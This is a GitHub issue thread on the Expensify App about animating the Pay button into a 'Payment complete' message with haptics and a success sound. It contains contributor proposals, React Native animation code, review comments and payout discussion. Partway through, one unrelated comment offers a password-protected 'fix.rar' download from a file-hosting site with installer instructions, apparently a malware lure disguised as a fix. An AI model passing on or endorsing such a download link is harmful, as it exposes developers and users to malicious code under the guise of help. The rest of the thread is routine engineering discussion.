### ISSUE TITLE
[Payment due 08-23]Emphasize completed payments with animation

### ISSUE THREAD

**Issue by roryabraham** [Expensify/App#48036]
slack discussion: https://expensify.slack.com/archives/CC7NECV4L/p1724447142877389

### Strategy

Expensify is a financial collaboration app, and in any financial conversation, money moving hands from one person to another tends to be the most critical part. That critical moment needs to be clear, unambiguous, and confidence-inspiring.

### Problem

When you receive a money request in NewDot, you’ll see a big green Pay button, and one tap instantly pays the request and changes and a checkmark appears saying that it’s paid. It’s such a crucial moment, but it’s unclear whether the payment was sent or not. As a user, I always find I have to double-take and make sure that the request was actually paid.

### Solution

Update the payment flow slightly to draw more attention to it and celebrate the transfer of funds. To do this, update NewDot such that when you tap the Pay button:

1. the button animates into a `Payment Complete` text, which collapses a few moments later
1. (iOS/Android) we trigger some strong haptic feedback to give a tactile confirmation of the completion of the payment.
1. Once the `Payment Complete` text finishes collapsing:
    1. a checkmark appears (as today)
    1. Play the `assets/sounds/success.mp3` sound, instead of `assets/sounds/done.mp3` like we do today

Example:

![image](https://github.com/user-attachments/assets/98f9d51b-82e4-47fb-a4f8-f200e9102ee6)

<details><summary>Issue Owner</summary>Current Issue Owner: @ZhenjaHorbach</details>

**Comment by roryabraham** [comment]
@dubielzyk-expensify has volunteered to help finalize the design here.

**Comment by othmanekahtal** [comment]
## Proposal

### Please re-state the problem that we are trying to solve in this issue.
Emphasize completed payments with animation
- update text after payment is completed
- update the sound

### What is the root cause of that problem?

Improvement

### What changes do you think we should make in order to solve the problem?

- change the params that passed to the function `playSound` in the button component from `SOUNDS.DONE` to `SOUNDS. SUCCESS `
- add the "Payment Complete" to the i18n
- update the text by updating the `buttonOptions.push({
            text: translate('iou.PaymentComplete')
        });`

### What alternative solutions did you explore? (Optional)

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by othmanekahtal** [comment]
Contributor details
Your Expensify account email: othmanekahtal@gmail.com

Upwork Profile Link: https://www.upwork.com/freelancers/~01a4cd3d656dcf35f6

**Comment by othmanekahtal** [comment]
@ZhenjaHorbach Hi Yauheni
thanks for noticing, i forked the repo and i made the changes take a look at this link : https://github.com/Expensify/App/commit/d2c943a9ba2745e1aea262cfac926ad0fb82e48a

**Comment by roryabraham** [comment]
I think @dubielzyk-expensify and I have an understanding on the animation. What we want will be very similar to this:

![CleanShot](https://github.com/user-attachments/assets/0665223d-6a97-4b9d-8a6b-7b38590aa6fd

**Comment by dubielzyk-expensify** [comment]
Exactly. Let's try to replicate exactly what's above 👍

**Comment by bernhardoj** [comment]
## Proposal

### Please re-state the problem that we are trying to solve in this issue.
Add animation and press feedback when paying report.

### What is the root cause of that problem?
Feature request.

### What changes do you think we should make in order to solve the problem?

1. Create a new component called `AnimatedSettlementButton` which handles the animation. The new component will contain the pay button and the payment complete text. There are 2 animations, scaling and fading. The animation will start if `shouldStartPaidAnimation` prop is true.

<details>

<summary> code </summary>

```
function AnimatedSettlementButton({
    shouldStartPaidAnimation = false,
    onAnimationFinish = () => {},
    ...settlementButtonProps
}: AnimatedSettlementButtonProps) {
    const styles = useThemeStyles();
    const buttonScale = useSharedValue(1);
    const buttonOpacity = useSharedValue(1);
    const paymentCompleteTextScale = useSharedValue(0);
    const paymentCompleteTextOpacity = useSharedValue(1);
    const height = useSharedValue<number>(variables.componentSizeNormal);
    const buttonStyles = useAnimatedStyle(() => ({
        scale: buttonScale.value,
        opacity: buttonOpacity.value,
    }));
    const paymentCompleteTextStyles = useAnimatedStyle(() => ({
        scale: paymentCompleteTextScale.value,
        opacity: paymentCompleteTextOpacity.value,
        position: 'absolute',
        left: '50%',
        transform: [{translateX: '-50%'}],
        transformOrigin: 'left center'
    }));

    const containerStyles = useAnimatedStyle(() => ({
        height: height.value,
        justifyContent: 'center',
        overflow: 'hidden',
    }));

    useEffect(() => {
        if (!shouldStartPaidAnimation) {
            return;
        }
        buttonScale.value = withTiming(0, {duration: 200});
        buttonOpacity.value = withTiming(0, {duration: 200});
        paymentCompleteTextScale.value = withTiming(1, {duration: 200}, () => {
            setTimeout(() => {
                height.value = withTiming(0, {duration: 200}, onAnimationFinish);
                paymentCompleteTextOpacity.value = withTiming(0, {duration: 200});
            }, 1000);
        });
    }, [shouldStartPaidAnimation]);

    return (
        <Animated.View style={containerStyles}>
            <Animated.View style={paymentCompleteTextStyles}>
                <Text style={[styles.buttonMediumText]}>Payment complete</Text>
            </Animated.View>
            <Animated.View style={buttonStyles}>
                <SettlementButton {...settlementButtonProps} />
            </Animated.View>
        </Animated.View>
    )
}

```

</details>

2. Set `shouldStartPaidAnimation` prop to true once we press the pay button and trigger the haptic feedback.
```
const [shouldStartPaidAnimation, setShouldStartPaidAnimation] = useState(false);
```
https://github.com/Expensify/App/blob/4fe86eb6baf6d71aa8757b2362a788d20ee42109/src/components/ReportActionItem/ReportPreview.tsx#L202-L207
```
setShouldStartPaidAnimation(true);
HapticFeedback.longPress(); // longPress feedback will trigger a strong feedback
```

3. Replace SettlementButton with AnimatedSettlementButton and pass the `shouldStartPaidAnimation` prop.
https://github.com/Expensify/App/blob/4fe86eb6baf6d71aa8757b2362a788d20ee42109/src/components/ReportActionItem/ReportPreview.tsx#L467-L469

4. To keep the button rendered while animating, we need to update `shouldShowSettlementButton` to include `shouldStartPaidAnimation`.
https://github.com/Expensify/App/blob/4fe86eb6baf6d71aa8757b2362a788d20ee42109/src/components/ReportActionItem/ReportPreview.tsx#L306
```
const shouldShowSettlementButton = shouldStartPaidAnimation || ((shouldShowPayButton || shouldShowApproveButton) && !showRTERViolationMessage);
```

5. Hide the button after the animation finishes by passing `onAnimationFinish` prop to the component.
```
onAnimationFinish={() => setShouldStartPaidAnimation(false)}
```


https://github.com/user-attachments/assets/863d8aaf-1dfd-4c0a-97fc-98cb40305bb8

**Comment by Christinadobrzyn** [comment]
Head up - I'm going to be ooo 9/4-9/10. I think this will be fine without any BZ work while I'm away, but I'm assigning a buddy just in case. 

@isabelastisser we are reviewing the [propsoal](https://github.com/Expensify/App/issues/48036#issuecomment-2326281231) at this time. 

@roryabraham, can you check out the [proposal review](https://github.com/Expensify/App/issues/48036#issuecomment-2326281231) when you have a moment? TY!

**Comment by roryabraham** [comment]
Yeah, that sounds like a strange implementation to me. We're creating a settlement button then having a boolean prop to determine whether the animation should start or not?

Seems like we should be able to encapsulate the logic to trigger the animation within the component itself, no?

**Comment by bernhardoj** [comment]
I decided to create a wrapper around the SettlementButton so the animation logic is decoupled from the SettlementButton. 

1. It's cleaner
2. Easier to maintain and scale the animation logic

**Comment by bernhardoj** [comment]
PR is ready
cc: @ZhenjaHorbach

**Comment by muttmuure** [comment]
MEDIUM priorities are debugging tools - moving this to LOW

**Comment by Christinadobrzyn** [comment]
PR deployed today - adding payment date

**Comment by Christinadobrzyn** [comment]
Payouts due:

- [ ] Contributor: $250 @bernhardoj (Upwork offer - https://www.upwork.com/nx/wm/offer/103991789)
- [ ] Contributor+: $250 @ZhenjaHorbach (Upwork offer - https://www.upwork.com/nx/wm/offer/103991778)

Do we need a regression test?

**Comment by roryabraham** [comment]
I do think we should amend the regression steps for paying expense reports and IOUs to account for this.

**Comment by roryabraham** [comment]
@bernhardoj hi 👋🏼 

@shawnborton noticed that we missed the animation on the checkmark itself. Can we create a follow-up PR to address that?

**Comment by bernhardoj** [comment]
@roryabraham sure, I'll open the PR tomorrow.

**Comment by bernhardoj** [comment]
PR is ready

cc: @ZhenjaHorbach

**Comment by Christinadobrzyn** [comment]
Hum, is today payment day? It looks like the regression PR was merged 3 days ago -https://github.com/Expensify/App/pull/49438

So I think we're waiting for a few more days? Do we need a regression test for this?

**Comment by Christinadobrzyn** [comment]
I'm going to be ooo until next Monday. Since this is waiting for a regression and day 7 should be Friday, do you mind if I just keep this and pay it out on Monday? 

If I understand this correctly, we are waiting on the [regression PR](https://github.com/Expensify/App/pull/49438) to merge, which should be on Friday. 

Payment would be the following - can we confirm?

Payouts due:

- [ ] Contributor: $125 (50% due to regression) @bernhardoj (in Newdot)
- [ ] Contributor+: $125 (50% due to regression) @ZhenjaHorbach (Upwork- https://www.upwork.com/nx/wm/offer/103991778)

**Comment by bernhardoj** [comment]
@Christinadobrzyn https://github.com/Expensify/App/pull/49438 is not a regression PR. We just missed to animate the checkmark too.

**Comment by bernhardoj** [comment]
https://github.com/Expensify/App/issues/49331 happens because of this [suggestion](https://github.com/Expensify/App/pull/48615#pullrequestreview-2302219740), @roryabraham does that count as a regression?

**Comment by bernhardoj** [comment]
If that's true, then I'll keep in mind ignoring any suggestion unrelated to the issue in the future since that doesn't benefit me at all and becomes a punishment to me if there is an issue arising from that suggestion.

**Comment by Christinadobrzyn** [comment]
Asking @roryabraham about the regression discussion - https://github.com/Expensify/App/issues/48036#issuecomment-2372870696

Payment summary here - https://github.com/Expensify/App/issues/48036#issuecomment-2371844761

**Comment by roryabraham** [comment]
Well regarding the regression, I don't think it was [this suggestion](https://github.com/Expensify/App/pull/48615#pullrequestreview-2302219740) per-se so much as by the migration from `withOnyx` -> `useOnyx`. I say that because it looks like the root cause was `lastPaymentMethod` being not loaded from Onyx yet when the component, which wasn't possible with `withOnyx`.

That said, I think we can waive any regression penalty in this case for a few reasons:

- @ZhenjaHorbach was the C+ reviewer for this issue and took care of fixing it in https://github.com/Expensify/App/pull/49345
- @bernhardoj opened a second PR to implement a design improvement we missed the first time around
- It's pretty hard to spot when the render-blocking behavior of `withOnyx` actually matters

I understand that doing this incremental `useOnyx` migration as part of PRs that might be otherwise unrelated is different from how we've operated in the past, but except in special circumstances, that's the expectation when working on PRs for now. We should try to be vigilant and do a bit of extra testing for more obscure keys, because they're less likely to be in the cache already than something like a report or session. For what it's worth though, as time goes on it will become decreasingly common that we have to do it, and the code will be simpler as a result.

**Comment by Christinadobrzyn** [comment]
Thank you for the thorough review, @roryabraham! 

Paying out based on [payment summary ](https://github.com/Expensify/App/issues/48036#issuecomment-2354044893) where the regression penalty isn't included. 

@bernhardoj can you please request payment through NewDot or let me know if you'd like me to pay you through Upwork. TY!

**Comment by bernhardoj** [comment]
Thank you! Requested in ND.

**Comment by Christinadobrzyn** [comment]
Thanks! @bernhardoj. I forgot to ask, do we need a regression test for this?

**Comment by Christinadobrzyn** [comment]
Thanks @ZhenjaHorbach - regression test here - https://github.com/Expensify/Expensify/issues/431955

Gonna close this out since the last step is @bernhardoj being paid via ND but they've requested the payment so nothing else to wait on.

**Comment by JmillsExpensify** [comment]
$250 approved for @bernhardoj
